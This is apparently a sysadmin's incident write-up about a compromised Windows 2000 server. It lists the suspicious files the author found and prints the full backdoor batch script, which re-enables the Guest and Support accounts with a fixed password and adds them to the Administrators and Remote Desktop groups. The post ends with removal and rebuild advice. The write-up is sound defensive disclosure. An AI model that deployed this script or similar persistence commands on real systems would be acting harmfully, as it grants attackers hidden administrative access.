Malicious Backdoor Batch Script Re-Enables Privileged Guest and Support Accounts on Windows Servers

I recently came across a Windows 2000 server that was found to have been compromised. During the investigation, both the Guest and Support_388945a0 accounts were found to had been placed in the Administrators and Remote Desktop Users groups (as the server was internet facing). Things got interesting however, when we removed these accounts from those groups and disabled them both. After logging back in a short while later, both Guest and Support accounts had been re-enabled and put back into the Admins and RDP groups.

When going to check the Windows hosts file to make sure there weren’t any modifications made to it, the following suspicious files were found in %systemroot%\system32\drivers\etc\

1.exe
2.exe
gm.dls
gmreadme
logoff.exe
netstat.exe
query.exe
t.msc
ts.exe

After some analysis, none of these files were found to be inherently malicious, but are instead used by a malicious batch script to enable the Guest and Support accounts with a specific password, and add them to the Admins and RDP group. The 1.exe file, for example, is just a executable with account-management capabilities.

In C:\WINDOWS\Application Compatibility Scripts\Install\Template there was a batch script called “.bat” with the following contents:

@cd %systemroot%\system32\drivers\etc\
@1 localgroup “Remote Desktop Users” SUPPORT_388945a0 /add
@1 localgroup “Remote Desktop Users” guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes

At this point it’s fairly evident what’s going on, this bat script is being run periodically, and runs 1.exe to ensure that both the Guest and Support_338945a0 accounts are present, and in the Administrators and Remote Desktop Users groups. It also sets the password to both of those accounts to ‘QQqqaa123321’. If you find these files on your system, consider that server compromised. Remove the files and disable those accounts in the first instance, but a full rebuild is highly recommended to rule out the possibility of other backdoors or rootkits.

These types of batch scripts are not uncommon for backdoor trojans. However, I couldn’t find any references to this particular backdoor, so thought I would post about this in case anyone else searches for information about it. Note that at the time of writing, this batch script is not picked up by any anti-virus software.